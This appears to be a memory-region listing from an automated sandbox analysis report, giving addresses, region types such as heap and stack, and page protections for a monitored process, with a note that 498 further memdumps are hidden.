page read and write
|
||
26B76C42000
|
trusted library allocation
|
page read and write
|
||
26B7726A000
|
trusted library allocation
|
page read and write
|
||
2600129E000
|
heap
|
page read and write
|
||
26B66BD8000
|
trusted library allocation
|
page read and write
|
||
700000
|
heap
|
page read and write
|
||
803C0FB000
|
stack
|
page read and write
|
||
26B00500000
|
heap
|
page read and write
|
||
26B782D3000
|
trusted library allocation
|
page read and write
|
||
26B66BA3000
|
trusted library allocation
|
page read and write
|
||
26B64F10000
|
heap
|
page read and write
|
||
825000
|
heap
|
page read and write
|
||
26B76BAE000
|
trusted library allocation
|
page read and write
|
||
1E8DAE18000
|
heap
|
page read and write
|
||
244F0820000
|
heap
|
page read and write
|
||
26B76BA6000
|
trusted library allocation
|
page read and write
|
||
A60000
|
trusted library allocation
|
page execute and read and write
|
||
1073A1D0000
|
heap
|
page read and write
|
||
26B64DFA000
|
heap
|
page read and write
|
||
26B77270000
|
trusted library allocation
|
page read and write
|
||
26B784BD000
|
trusted library allocation
|
page read and write
|
||
26B66B41000
|
trusted library allocation
|
page read and write
|
||
7FFAACBE4000
|
trusted library allocation
|
page read and write
|
||
4AD0000
|
heap
|
page read and write
|
||
27091F10000
|
heap
|
page read and write
|
||
26B66DEC000
|
trusted library allocation
|
page read and write
|
||
7FFAACCE0000
|
trusted library allocation
|
page execute and read and write
|
||
26B76D45000
|
trusted library allocation
|
page read and write
|
||
26B7815E000
|
trusted library allocation
|
page read and write
|
||
501E000
|
stack
|
page read and write
|
||
26B771C6000
|
trusted library allocation
|
page read and write
|
||
26B66B9F000
|
trusted library allocation
|
page read and write
|
||
26B76C9E000
|
trusted library allocation
|
page read and write
|
||
803B0ED000
|
stack
|
page read and write
|
||
26B781BA000
|
trusted library allocation
|
page read and write
|
||
26B64DD0000
|
heap
|
page read and write
|
||
238D1CA0000
|
heap
|
page read and write
|
||
557E000
|
stack
|
page read and write
|
||
26B64DD6000
|
heap
|
page read and write
|
||
26B66C3F000
|
trusted library allocation
|
page read and write
|
||
238D1C90000
|
heap
|
page read and write
|
||
26B66BD2000
|
trusted library allocation
|
page read and write
|
||
244F2210000
|
heap
|
page read and write
|
||
26B65065000
|
heap
|
page read and write
|
||
7FFB1D562000
|
unkown
|
page readonly
|
||
26B77B13000
|
trusted library allocation
|
page read and write
|
||
477E000
|
stack
|
page read and write
|
||
238D20D0000
|
heap
|
page read and write
|
||
26B77C73000
|
trusted library allocation
|
page read and write
|
||
29EAFE000
|
stack
|
page read and write
|
||
26B7721A000
|
trusted library allocation
|
page read and write
|
||
26B78167000
|
trusted library allocation
|
page read and write
|
||
7FFB1D565000
|
unkown
|
page readonly
|
||
26B66BDA000
|
trusted library allocation
|
page read and write
|
||
26B6709B000
|
trusted library allocation
|
page read and write
|
||
26B6690C000
|
heap
|
page read and write
|
||
1E8DAFA0000
|
heap
|
page read and write
|
||
26B77B48000
|
trusted library allocation
|
page read and write
|
||
26B77278000
|
trusted library allocation
|
page read and write
|
||
26B6685F000
|
heap
|
page read and write
|
||
803C2FD000
|
stack
|
page read and write
|
||
26B66B9D000
|
trusted library allocation
|
page read and write
|
||
26B66C18000
|
trusted library allocation
|
page read and write
|
||
803B9FD000
|
stack
|
page read and write
|
||
26B77BB2000
|
trusted library allocation
|
page read and write
|
||
26B76ADA000
|
trusted library allocation
|
page read and write
|
||
26001287000
|
heap
|
page read and write
|
||
52FE000
|
stack
|
page read and write
|
||
238D1D50000
|
heap
|
page read and write
|
||
26B66C0B000
|
trusted library allocation
|
page read and write
|
||
26B76C4E000
|
trusted library allocation
|
page read and write
|
||
26B771D7000
|
trusted library allocation
|
page read and write
|
||
26B66C3C000
|
trusted library allocation
|
page read and write
|
||
26B64DDC000
|
heap
|
page read and write
|
||
57FF000
|
stack
|
page read and write
|
||
26001220000
|
heap
|
page read and write
|
||
7FFAACDA0000
|
trusted library allocation
|
page execute and read and write
|
||
1E8DAE10000
|
heap
|
page read and write
|
||
26B77AD3000
|
trusted library allocation
|
page read and write
|
||
803B8FE000
|
stack
|
page read and write
|
||
26B7731B000
|
trusted library allocation
|
page read and write
|
||
27091F50000
|
heap
|
page read and write
|
||
9C3000
|
trusted library allocation
|
page execute and read and write
|
||
26B67122000
|
trusted library allocation
|
page read and write
|
||
260011B0000
|
heap
|
page read and write
|
||
26B66810000
|
heap
|
page read and write
|
||
27092120000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
26B66819000
|
heap
|
page read and write
|
||
26B7820F000
|
trusted library allocation
|
page read and write
|
||
6F9000
|
stack
|
page read and write
|
||
26B76CF6000
|
trusted library allocation
|
page read and write
|
||
26B66E68000
|
trusted library allocation
|
page read and write
|
||
26B76C03000
|
trusted library allocation
|
page read and write
|
||
26B76C3C000
|
trusted library allocation
|
page read and write
|
||
26B64E3C000
|
heap
|
page read and write
|
||
26B66C25000
|
trusted library allocation
|
page read and write
|
||
1073A228000
|
heap
|
page read and write
|
||
26B67083000
|
trusted library allocation
|
page read and write
|
||
26B77A5D000
|
trusted library allocation
|
page read and write
|
||
26B76CD6000
|
trusted library allocation
|
page read and write
|
||
27091F7B000
|
heap
|
page read and write
|
||
26B76C54000
|
trusted library allocation
|
page read and write
|
||
26B77CBD000
|
trusted library allocation
|
page read and write
|
||
26B7733D000
|
trusted library allocation
|
page read and write
|
||
26B76D66000
|
trusted library allocation
|
page read and write
|
||
26B76C5D000
|
trusted library allocation
|
page read and write
|
||
2530000
|
heap
|
page read and write
|
||
26B66B4C000
|
trusted library allocation
|
page read and write
|
||
7FFAACBC2000
|
trusted library allocation
|
page read and write
|
||
26B66E8F000
|
trusted library allocation
|
page read and write
|
||
26B66DBA000
|
trusted library allocation
|
page read and write
|
||
26B66BC9000
|
trusted library allocation
|
page read and write
|
||
260011A0000
|
heap
|
page read and write
|
||
7F8000
|
heap
|
page read and write
|
||
26B771A4000
|
trusted library allocation
|
page read and write
|
||
26001285000
|
heap
|
page read and write
|
||
803C5FE000
|
stack
|
page read and write
|
||
26B66910000
|
heap
|
page read and write
|
||
7FFAACBEB000
|
trusted library allocation
|
page execute and read and write
|
||
26B76C96000
|
trusted library allocation
|
page read and write
|
||
BF90DFE000
|
unkown
|
page read and write
|
||
26B66E88000
|
trusted library allocation
|
page read and write
|
||
803B2FF000
|
stack
|
page read and write
|
||
1AB2A7C000
|
stack
|
page read and write
|
||
26B77ABD000
|
trusted library allocation
|
page read and write
|
||
26B77289000
|
trusted library allocation
|
page read and write
|
||
A80000
|
heap
|
page read and write
|
||
26B76AD0000
|
trusted library allocation
|
page read and write
|
||
26B66BF6000
|
trusted library allocation
|
page read and write
|
||
1AB2AFF000
|
stack
|
page read and write
|
||
26B77AE8000
|
trusted library allocation
|
page read and write
|
||
803B5FE000
|
stack
|
page read and write
|
||
26B76BA9000
|
trusted library allocation
|
page read and write
|
||
9D0000
|
trusted library allocation
|
page read and write
|
||
26B783B2000
|
trusted library allocation
|
page read and write
|
||
26001260000
|
heap
|
page read and write
|
||
26B77207000
|
trusted library allocation
|
page read and write
|
||
1E8DADA0000
|
heap
|
page read and write
|
||
26B771FA000
|
trusted library allocation
|
page read and write
|
||
26B64EF0000
|
heap
|
page read and write
|
||
26B7F310000
|
heap
|
page execute and read and write
|
||
26B77AFD000
|
trusted library allocation
|
page read and write
|
||
26B782F3000
|
trusted library allocation
|
page read and write
|
There are 498 hidden memdumps, click here to show them.